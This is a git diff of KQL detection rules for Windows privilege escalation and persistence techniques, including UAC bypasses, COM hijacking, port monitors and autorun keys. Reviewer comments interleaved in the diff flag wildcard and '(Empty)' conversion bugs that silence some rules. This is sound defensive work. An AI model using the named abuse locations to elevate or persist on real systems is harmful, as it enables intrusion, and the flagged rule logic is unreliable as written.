-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010
-
-DeviceRegistryEvents
+// Title: Add Port Monitor Persistence in Registry
+// Author: frack113
+// Date: 2021-12-30
+// Level: medium
+// Description: Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.
+// A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010
+
+DeviceRegistryEvents
 | where (RegistryValueData endswith ".dll" and RegistryKey endswith "\\Control\\Print\\Monitors*") and (not(((RegistryValueData =~ "cpwmon64_v40.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "\\Control\\Print\\Monitors\\CutePDF Writer Monitor v4.0\\Driver" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or RegistryKey contains "\\Control\\Print\\Monitors\\MONVNC\\Driver" or (RegistryKey endswith "Control\\Print\\Environments*" and RegistryKey endswith "\\Drivers*" and RegistryKey contains "\\VNC Printer"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/Privilege Escalation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql
index 9f38fa73..ee4e890d 100644
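Review bot: `RegistryKey endswith "\\Control\\Print\\Monitors*"` in the selection on the new side keeps a literal asterisk inside an `endswith` string, so it only matches a key path that really ends in `*`; the rule can therefore never fire, and the same construct in the exclusion (`endswith "Control\\Print\\Environments*"`, `endswith "\\Drivers*"`) makes that allowlist branch dead code. A trailing wildcard should be translated into a prefix-of-path match, e.g. `RegistryKey contains "\\Control\\Print\\Monitors\\"` and `RegistryKey contains "\\Drivers\\"`. The same translation defect appears in the exclusion of the Classes Autorun Keys Modification hunk (`endswith "\\lnkfile\\shellex\\ContextMenuHandlers*"`) and in the selection of the COM Object Hijacking hunk (`endswith "\\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}*"` and the sibling CLSIDs, plus `endswith "\\CLSID*"`), where it again silences the rule entirely. This hunk looks like a line-ending-only rewrite, so the defect is presumably in the converter's wildcard handling and should be fixed there rather than by hand-editing the generated rules.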
--- a/KQL/rules/Privilege Escalation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql
+++ b/KQL/rules/Privilege Escalation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql
@@ -1,10 +1,10 @@
-// Title: Allow Service Access Using Security Descriptor Tampering Via Sc.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-28
-// Level: high
-// Description: Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003
-
-DeviceProcessEvents
+// Title: Allow Service Access Using Security Descriptor Tampering Via Sc.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-28
+// Level: high
+// Description: Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "A;") and (ProcessCommandLine contains ";IU" or ProcessCommandLine contains ";SU" or ProcessCommandLine contains ";BA" or ProcessCommandLine contains ";SY" or ProcessCommandLine contains ";WD")) and (not(InitiatingProcessFolderPath =~ "C:\\Hexnode\\Hexnode Agent\\Current\\HexnodeAgent.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/atbroker_registry_change.kql b/KQL/rules/Privilege Escalation/atbroker_registry_change.kql
index b7df7feb..20c6db50 100644
--- a/KQL/rules/Privilege Escalation/atbroker_registry_change.kql
+++ b/KQL/rules/Privilege Escalation/atbroker_registry_change.kql
@@ -1,12 +1,12 @@
-// Title: Atbroker Registry Change
-// Author: Mateusz Wydra, oscd.community
-// Date: 2020-10-13
-// Level: medium
-// Description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1218, attack.persistence, attack.t1547
-// False Positives:
-// - Creation of non-default, legitimate at usage
-
-DeviceRegistryEvents
+// Title: Atbroker Registry Change
+// Author: Mateusz Wydra, oscd.community
+// Date: 2020-10-13
+// Level: medium
+// Description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1218, attack.persistence, attack.t1547
+// False Positives:
+// - Creation of non-default, legitimate at usage
+
+DeviceRegistryEvents
 | where (RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs" or RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") and (not(((RegistryValueData =~ "(Empty)" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\atbroker.exe" and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/bypass_uac_using_delegateexecute.kql b/KQL/rules/Privilege Escalation/bypass_uac_using_delegateexecute.kql
index 6a8ba99c..a5785617 100644
--- a/KQL/rules/Privilege Escalation/bypass_uac_using_delegateexecute.kql
+++ b/KQL/rules/Privilege Escalation/bypass_uac_using_delegateexecute.kql
@@ -1,10 +1,10 @@
-// Title: Bypass UAC Using DelegateExecute
-// Author: frack113
-// Date: 2022-01-05
-// Level: high
-// Description: Bypasses User Account Control using a fileless method
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
-
-DeviceRegistryEvents
+// Title: Bypass UAC Using DelegateExecute
+// Author: frack113
+// Date: 2022-01-05
+// Level: high
+// Description: Bypasses User Account Control using a fileless method
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "(Empty)" and RegistryKey endswith "\\open\\command\\DelegateExecute"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/bypass_uac_using_event_viewer.kql b/KQL/rules/Privilege Escalation/bypass_uac_using_event_viewer.kql
index 0ba67225..e724e999 100644
--- a/KQL/rules/Privilege Escalation/bypass_uac_using_event_viewer.kql
+++ b/KQL/rules/Privilege Escalation/bypass_uac_using_event_viewer.kql
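Review bot: `RegistryValueData =~ "(Empty)"` on the new side compares against the literal string `(Empty)`, which is the placeholder Sysmon writes for a value with no data; in DeviceRegistryEvents an empty or absent DelegateExecute value is more likely surfaced as an empty string or null, in which case this rule never fires on the telemetry it is now targeting. Widening the test to `| where isempty(RegistryValueData) and RegistryKey endswith "\\open\\command\\DelegateExecute"` (or keeping the literal and adding `or isempty(RegistryValueData)`) covers both representations, which is what the Classes Autorun Keys Modification hunk already does with `isnull(RegistryValueData)`. The same literal appears inside the exclusion of the Atbroker Registry Change hunk, where it instead makes that allowlist branch dead and raises false positives for atbroker.exe activity. This hunk looks like a line-ending-only rewrite, so the behaviour is inherited from how the converter maps the `(Empty)` value rather than introduced here.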
@@ -1,10 +1,10 @@
-// Title: Bypass UAC Using Event Viewer
-// Author: frack113
-// Date: 2022-01-05
-// Level: high
-// Description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010
-
-DeviceRegistryEvents
+// Title: Bypass UAC Using Event Viewer
+// Author: frack113
+// Date: 2022-01-05
+// Level: high
+// Description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010
+
+DeviceRegistryEvents
 | where RegistryKey endswith "_Classes\\mscfile\\shell\\open\\command\\(Default)" and (not(RegistryValueData startswith "%SystemRoot%\\system32\\mmc.exe \"%1\" %"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql b/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql
index 150fd39b..695c79b7 100644
--- a/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql
+++ b/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql
@@ -1,12 +1,12 @@
-// Title: Bypass UAC Using SilentCleanup Task
-// Author: frack113, Nextron Systems
-// Date: 2022-01-06
-// Level: high
-// Description: Detects the setting of the environement variable "windir" to a non default value.
-// Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task.
-// The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
-
-DeviceRegistryEvents
+// Title: Bypass UAC Using SilentCleanup Task
+// Author: frack113, Nextron Systems
+// Date: 2022-01-06
+// Level: high
+// Description: Detects the setting of the environement variable "windir" to a non default value.
+// Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task.
+// The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\Environment\\windir" and (not(RegistryValueData =~ "%SystemRoot%"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/bypass_uac_via_cmstp.kql b/KQL/rules/Privilege Escalation/bypass_uac_via_cmstp.kql
index 8d614901..9f088b8a 100644
--- a/KQL/rules/Privilege Escalation/bypass_uac_via_cmstp.kql
+++ b/KQL/rules/Privilege Escalation/bypass_uac_via_cmstp.kql
@@ -1,12 +1,12 @@
-// Title: Bypass UAC via CMSTP
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019-10-24
-// Level: high
-// Description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002, attack.t1218.003
-// False Positives:
-// - Legitimate use of cmstp.exe utility by legitimate user
-
-DeviceProcessEvents
+// Title: Bypass UAC via CMSTP
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: high
+// Description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002, attack.t1218.003
+// False Positives:
+// - Legitimate use of cmstp.exe utility by legitimate user
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "-s" or ProcessCommandLine contains "/au" or ProcessCommandLine contains "-au" or ProcessCommandLine contains "/ni" or ProcessCommandLine contains "-ni") and (FolderPath endswith "\\cmstp.exe" or ProcessVersionInfoOriginalFileName =~ "CMSTP.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/bypass_uac_via_wsreset_exe.kql b/KQL/rules/Privilege Escalation/bypass_uac_via_wsreset_exe.kql
index 3ecc9937..5f35acbd 100644
--- a/KQL/rules/Privilege Escalation/bypass_uac_via_wsreset_exe.kql
+++ b/KQL/rules/Privilege Escalation/bypass_uac_via_wsreset_exe.kql
@@ -1,12 +1,12 @@
-// Title: Bypass UAC via WSReset.exe
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth
-// Date: 2019-10-24
-// Level: high
-// Description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
-// False Positives:
-// - Unknown sub processes of Wsreset.exe
-
-DeviceProcessEvents
+// Title: Bypass UAC via WSReset.exe
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth
+// Date: 2019-10-24
+// Level: high
+// Description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+// False Positives:
+// - Unknown sub processes of Wsreset.exe
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\wsreset.exe" and (not((FolderPath endswith "\\conhost.exe" or ProcessVersionInfoOriginalFileName =~ "CONHOST.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql b/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql
index 4514039e..deff9744 100644
--- a/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql
+++ b/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql
@@ -1,11 +1,11 @@
-// Title: Change Default File Association To Executable Via Assoc
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-28
-// Level: high
-// Description: Detects when a program changes the default file association of any extension to an executable.
-// When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.001
-
-DeviceProcessEvents
+// Title: Change Default File Association To Executable Via Assoc
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects when a program changes the default file association of any extension to an executable.
+// When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.001
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "assoc " and ProcessCommandLine contains "exefile") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) and (not(ProcessCommandLine contains ".exe=exefile"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql b/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql
index d54b7eed..337598da 100644
--- a/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql
+++ b/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql
@@ -1,13 +1,13 @@
-// Title: Change Default File Association Via Assoc
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2019-10-21
-// Level: low
-// Description: Detects file association changes using the builtin "assoc" command.
-// When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.001
-// False Positives:
-// - Admin activity
-
-DeviceProcessEvents
+// Title: Change Default File Association Via Assoc
+// Author: Timur Zinniatullin, oscd.community
+// Date: 2019-10-21
+// Level: low
+// Description: Detects file association changes using the builtin "assoc" command.
+// When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.001
+// False Positives:
+// - Admin activity
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "assoc" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql b/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql
index 7f8d9a58..d31c066e 100644
--- a/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql
+++ b/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql
@@ -1,12 +1,12 @@
-// Title: Changing Existing Service ImagePath Value Via Reg.EXE
-// Author: frack113
-// Date: 2021-12-30
-// Level: medium
-// Description: Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.
-// Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.
-// Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.011
-
-DeviceProcessEvents
+// Title: Changing Existing Service ImagePath Value Via Reg.EXE
+// Author: frack113
+// Date: 2021-12-30
+// Level: medium
+// Description: Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.
+// Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.
+// Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.011
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "add " and ProcessCommandLine contains "SYSTEM\\CurrentControlSet\\Services\\" and ProcessCommandLine contains " ImagePath ") and FolderPath endswith "\\reg.exe") and (ProcessCommandLine contains " -d " or ProcessCommandLine contains " /d " or ProcessCommandLine contains " –d " or ProcessCommandLine contains " —d " or ProcessCommandLine contains " ―d ")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/classes_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/classes_autorun_keys_modification.kql
index 6cf0b25b..f4f97bdf 100644
--- a/KQL/rules/Privilege Escalation/classes_autorun_keys_modification.kql
+++ b/KQL/rules/Privilege Escalation/classes_autorun_keys_modification.kql
@@ -1,13 +1,13 @@
-// Title: Classes Autorun Keys Modification
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019-10-25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
-// False Positives:
-// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
-// - Legitimate administrator sets up autorun keys for legitimate reason
-
-DeviceRegistryEvents
+// Title: Classes Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
 | where (RegistryKey contains "\\Software\\Classes" and (RegistryKey contains "\\Folder\\ShellEx\\ExtShellFolderViews" or RegistryKey contains "\\Folder\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\Folder\\Shellex\\ColumnHandlers" or RegistryKey contains "\\Filter" or RegistryKey contains "\\Exefile\\Shell\\Open\\Command\\(Default)" or RegistryKey contains "\\Directory\\Shellex\\DragDropHandlers" or RegistryKey contains "\\Directory\\Shellex\\CopyHookHandlers" or RegistryKey contains "\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance" or RegistryKey contains "\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance" or RegistryKey contains
"\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance" or RegistryKey contains "\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance" or RegistryKey contains "\\Classes\\AllFileSystemObjects\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\.exe" or RegistryKey contains "\\.cmd" or RegistryKey contains "\\ShellEx\\PropertySheetHandlers" or RegistryKey contains "\\ShellEx\\ContextMenuHandlers")) and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\drvinst.exe" or RegistryValueData =~ "(Empty)" or isnull(RegistryValueData) or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" and RegistryKey endswith "\\lnkfile\\shellex\\ContextMenuHandlers*")))) and (not(RegistryValueData =~ "{807583E5-5146-11D5-A672-00B0D022E945}")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/com_hijacking_via_treatas.kql b/KQL/rules/Privilege Escalation/com_hijacking_via_treatas.kql index 1cebb162..28e2f9a0 100644 --- a/KQL/rules/Privilege Escalation/com_hijacking_via_treatas.kql +++ b/KQL/rules/Privilege Escalation/com_hijacking_via_treatas.kql 
@@ -1,12 +1,12 @@
-// Title: COM Hijacking via TreatAs
-// Author: frack113
-// Date: 2022-08-28
-// Level: medium
-// Description: Detect modification of TreatAs key to enable "rundll32.exe -sta" command
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
-// False Positives:
-// - Legitimate use
-
-DeviceRegistryEvents
+// Title: COM Hijacking via TreatAs
+// Author: frack113
+// Date: 2022-08-28
+// Level: medium
+// Description: Detect modification of TreatAs key to enable "rundll32.exe -sta" command
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+// False Positives:
+// - Legitimate use
+
+DeviceRegistryEvents
 | where RegistryKey endswith "TreatAs\\(Default)" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql b/KQL/rules/Privilege Escalation/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql
index 24b51adb..17ddb5f8 100644
--- a/KQL/rules/Privilege Escalation/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql
+++ b/KQL/rules/Privilege Escalation/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql
@@ -1,12 +1,12 @@
-// Title: COM Object Hijacking Via Modification Of Default System CLSID Default Value
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-07-16
-// Level: high
-// Description: Detects potential COM object hijacking via modification of default system CLSID.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: COM Object Hijacking Via Modification Of Default System CLSID Default Value
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-16
+// Level: high
+// Description: Detects potential COM object hijacking via modification of default system CLSID.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where ((RegistryKey endswith "\\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}*" or RegistryKey endswith "\\{2155fee3-2419-4373-b102-6843707eb41f}*" or RegistryKey endswith "\\{4590f811-1d3a-11d0-891f-00aa004b2e24}*" or RegistryKey endswith "\\{4de225bf-cf59-4cfc-85f7-68b90f185355}*" or RegistryKey endswith "\\{ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea}*" or RegistryKey endswith "\\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}*" or RegistryKey endswith "\\{F82B4EF1-93A9-4DDE-8015-F7950A1A6E31}*" or RegistryKey endswith "\\{7849596a-48ea-486e-8937-a2a3009f31a9}*" or RegistryKey endswith "\\{0b91a74b-ad7c-4a9d-b563-29eef9167172}*" or RegistryKey endswith "\\{603D3801-BD81-11d0-A3A5-00C04FD706EC}*" or RegistryKey endswith "\\{30D49246-D217-465F-B00B-AC9DDD652EB7}*" or RegistryKey endswith "\\{A7A63E5C-3877-4840-8727-C1EA9D7A4D50}*" or RegistryKey endswith "\\{2227A280-3AEA-1069-A2DE-08002B30309D}*" or RegistryKey endswith "\\{2DEA658F-54C1-4227-AF9B-260AB5FC3543}*" or RegistryKey endswith "\\{AA509086-5Ca9-4C25-8F95-589D3C07B48A}*") and (RegistryKey endswith "\\CLSID*" and 
(RegistryKey endswith "\\InprocServer32\\(Default)" or RegistryKey endswith "\\LocalServer32\\(Default)"))) and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains "\\AppData\\Local\\" or RegistryValueData contains "\\Desktop\\" or RegistryValueData contains "\\Downloads\\" or RegistryValueData contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or RegistryValueData contains "\\System32\\spool\\drivers\\color\\" or RegistryValueData contains "\\Temporary Internet" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "%appdata%" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Pictures\\")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/common_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/common_autorun_keys_modification.kql
index 39c14ca1..e5da89bd 100644
--- a/KQL/rules/Privilege Escalation/common_autorun_keys_modification.kql
+++ b/KQL/rules/Privilege Escalation/common_autorun_keys_modification.kql
@@ -1,13 +1,13 @@
-// Title: Common Autorun Keys Modification
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)
-// Date: 2019-10-25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
-// False Positives:
-// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
-// - Legitimate administrator sets up autorun keys for legitimate reason
-
-DeviceRegistryEvents
+// Title: Common Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
 | where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows CE Services\\AutoStart" or RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Command Processor\\Autorun" or RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Active Setup\\Installed Components" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnDisconnect" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnConnect" or RegistryKey contains "\\SYSTEM\\Setup\\CmdLine" or RegistryKey contains "\\Software\\Microsoft\\Ctf\\LangBarAddin" or RegistryKey contains "\\Software\\Microsoft\\Command Processor\\Autorun" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components" or RegistryKey contains "\\SOFTWARE\\Classes\\Protocols\\Handler" or RegistryKey contains "\\SOFTWARE\\Classes\\Protocols\\Filter" or RegistryKey contains "\\SOFTWARE\\Classes\\Htmlfile\\Shell\\Open\\Command\\(Default)" or RegistryKey contains "\\Environment\\UserInitMprLogonScript" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\Control Panel\\Desktop\\Scrnsave.exe" or RegistryKey contains "\\Software\\Microsoft\\Internet Explorer\\UrlSearchHooks" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Internet 